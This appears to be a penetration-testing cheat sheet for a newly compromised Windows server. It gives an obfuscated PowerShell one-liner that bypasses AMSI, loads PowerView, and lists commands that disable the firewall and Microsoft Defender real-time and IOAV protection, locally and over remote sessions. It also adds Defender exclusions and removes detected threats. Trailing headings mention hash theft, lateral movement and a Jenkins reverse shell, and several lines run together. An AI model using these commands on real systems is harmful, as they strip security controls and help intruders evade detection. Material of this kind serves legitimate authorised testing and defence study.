New Server
Bypass AMSI:
powershell -ep bypass
SET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
. .\PowerView.ps1
Get-NetUserDisable Firewall
#check status of Microsoft Defender
Get-MpComputerStatus
#Disable Firewall
powershell -c Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off
powershell -command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
#Disable Antivirus
Set-MpPreference -DisableRealtimeMonitoring $true
#Exclude file type
Set-MpPreference -ExclusionExtension EXTENSION
#Exclude locations
Set-MpPreference -ExclusionPath PATH\TO\FOLDER
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess
#How to delete active threat on Microsoft Defender
Remove-MpThreatDownloading scripts
Enumerate user
access to other servers? for remote command via powershell
Get Hashes and move Lateral
Jenkins Revershell
Downloading scripts
Last updated